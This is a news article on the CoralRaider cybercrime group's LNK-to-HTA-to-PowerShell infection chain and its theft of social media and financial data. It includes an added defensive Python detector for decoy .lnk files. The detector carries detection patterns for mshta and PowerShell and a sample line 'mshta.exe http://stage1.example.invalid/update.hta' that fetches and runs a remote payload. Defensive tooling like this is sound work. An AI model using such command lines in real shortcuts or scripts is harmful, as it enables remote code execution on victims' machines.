Vietnamese Cybercrime Group CoralRaider Nets Financial Data
With a complex attack chain and using Telegram for its command and control, CoralRaider targets victims in Asian countries — and appears to have accidentally infected itself as well.
A newcomer cybercrime group linked to Vietnam has targeted individuals and organizations in Asia, attempting to steal social media account information and user data.
CoralRaider, which first appeared in late 2023, relies heavily on social engineering and legitimate services for data exfiltration, and it develops custom tools for loading malware onto victim systems. Yet the group has also made some rookie mistakes, such as inadvertently infecting their own systems, which exposed their activities, threat researchers with Cisco’s Talos threat intelligence group stated in a new analysis on CoralRaider.
While Vietnam has become increasingly active in cyber operations, this group does not appear to be working with the government, says Chetan Raghuprasad, security research technical leader for Cisco’s Talos group.
“The main priority is financial gain, and the actor is attempting to hijack the victim’s social media business and advertis[ing] accounts,” he says. “The potential exposure for follow-on attacks, including delivering other malware, is also possible. Our research has not seen any examples of other payloads being delivered.”
Vietnam threat actors frequently focus on social media. The infamous OceanLotus group — also known as APT32 — has attacked other governments, dissidents, and journalists in Southeast Asian countries, including in Vietnam. A military-associated group, Force 47 — linked to the Vietnamese army’s official television station — regularly attempts to influence social media groups.
CoralRaider, however, appears to be connected to profit motives rather than nationalist agendas.
“At this moment, we do not have any evidence or information on signs of CoralRaider working with the Vietnamese government,” Raghuprasad says.
Multistage Infection Chain
A CoralRaider campaign typically starts with a Windows shortcut (.LNK) file, often using a .PDF extension in an attempt to fool the victim into opening the files, according to the Cisco analysis. Following that, the attackers move through a series of stages in their attack:
Windows shortcut downloads and executes an HTML application (HTA) file from an attacker-controlled server
HTA file executes an embedded Visual Basic script
VB script executes a PowerShell script, which then runs three more PowerShell scripts: a series of anti-analysis checks to detect whether the tool is running in a virtual machine, a bypass for the system’s User Account Control (UAC), and code that disables any notifications to the user
Final script runs RotBot, a loader that performs detection evasion, conducts reconnaissance on the system, and downloads a configuration file
RotBot then typically downloads XClient, which collects a variety of user data from the system, including social media account credentials
In addition to credentials, XClient also steals browser data, credit card account information, and other financial data. And lastly, XClient takes a screenshot of the victim’s desktop and uploads it.
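The first stage of the chain above gives defenders a cheap triage signal: a shortcut that carries a document extension in its name and whose embedded strings reference mshta, an .hta payload or a remote URL. The script below is an added example, not code from the Cisco analysis or from CoralRaider; the ShellLink magic bytes are the public format's header, while the sample file and its URL are constructed here.

```python
import re
from pathlib import PurePath

# 4-byte HeaderSize (0x4C) followed by the ShellLink CLSID
# 00021401-0000-0000-C000-000000000046 as stored on disk (little-endian GUID).
LNK_MAGIC = b"\x4c\x00\x00\x00" + bytes.fromhex("0114020000000000c000000000000046")

# Strings that rarely belong in a legitimate document shortcut.
SUSPICIOUS = {
    "hta_launcher": re.compile(rb"mshta(\.exe)?", re.IGNORECASE),
    "hta_payload": re.compile(rb"\.hta\b", re.IGNORECASE),
    "remote_url": re.compile(rb"https?://", re.IGNORECASE),
    "powershell": re.compile(rb"powershell|pwsh", re.IGNORECASE),
}
DOC_LIKE = {".pdf", ".doc", ".docx", ".xls", ".xlsx"}


def decoy_extension(filename: str) -> bool:
    """True for names such as 'quote.pdf.lnk' that mimic a document but are shortcuts."""
    suffixes = [s.lower() for s in PurePath(filename).suffixes]
    return len(suffixes) >= 2 and suffixes[-1] == ".lnk" and suffixes[-2] in DOC_LIKE


def assess_shortcut(filename: str, data: bytes) -> dict:
    """Score one file: LNK header check, decoy extension, and embedded launch strings."""
    decoy = decoy_extension(filename)
    if not data.startswith(LNK_MAGIC):
        return {"is_lnk": False, "decoy_extension": decoy, "indicators": [], "score": 0}
    # LNK stores most strings as UTF-16LE; dropping NULs folds ASCII-range text
    # into plain bytes so one regex set covers both encodings.
    text = data.replace(b"\x00", b"")
    hits = [label for label, rx in SUSPICIOUS.items() if rx.search(text)]
    score = len(hits) + (2 if decoy else 0)
    return {"is_lnk": True, "decoy_extension": decoy, "indicators": hits, "score": score}


# Constructed sample (not a real CoralRaider artifact): 76-byte header, then a
# fake command line of the kind the HTA-download stage would carry.
SAMPLE_LNK = (
    LNK_MAGIC + b"\x00" * 56
    + "mshta.exe http://stage1.example.invalid/update.hta".encode("utf-16le")
)
BENIGN_LNK = LNK_MAGIC + b"\x00" * 56 + r"C:\Users\me\report.pdf".encode("utf-16le")

if __name__ == "__main__":
    for name, blob in (("Quotation.pdf.lnk", SAMPLE_LNK), ("report.lnk", BENIGN_LNK)):
        print(name, assess_shortcut(name, blob))
```

Anything scoring 3 or more here is worth pulling for a look at the full LinkTargetIDList and arguments with a proper LNK parser.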
Meanwhile, the researchers say there are indications that the attackers had targeted individuals in Vietnam as well.
“The [XClient] stealer function maps the stolen victim’s information to hardcoded Vietnamese words and writes them to a text file in the victim machine’s temporary folder before exfiltration,” the analysis stated. “One example function we observed is used to steal the victim’s Facebook Ads account and has hardcoded Vietnamese words for Account rights, Threshold, Spent, Time Zone, and Date Created.”
Shooting Themselves in the Foot
The CoralRaider group used an automated bot on the Telegram service as a command-and-control channel as well as to exfiltrate data from victims’ systems. However, the cybercriminal group appears to have infected one of its own machines, because the Cisco researchers discovered screenshots of the attackers’ own desktop posted to the channel.
“Analyzing the images of the actor’s Desktop on the Telegram bot, we found a few Telegram groups in Vietnamese named ‘Kiếm tiền từ Facebook,’ ‘Mua Bán Scan MINI,’ and ‘Mua Bán Scan Meta,’” Cisco Talos stated in the analysis. “Monitoring these groups revealed that they were underground markets where, among other activities, victim data was traded.”
CoralRaider’s arrival on the cyber threat scene is not surprising: Vietnam is currently facing an increase in threats from account-stealing malware, says Sakshi Grover, research manager in IDC’s Cybersecurity Services group for the Asia/Pacific region.
“While historically less associated with cybercrime compared to other Asian nations, Vietnam’s rapid adoption of digital technologies has made it more susceptible to cyber threats,” she says. “Advanced persistent threats (APTs) are increasingly targeting government entities, critical infrastructure, and businesses, utilizing sophisticated techniques like custom malware and social engineering to infiltrate systems and steal sensitive data.”
Because economic conditions vary across Vietnam — with some areas experiencing limited job opportunities, resulting in low wages for highly skilled roles — individuals can be incentivized to engage in cybercrime to make money, Grover says.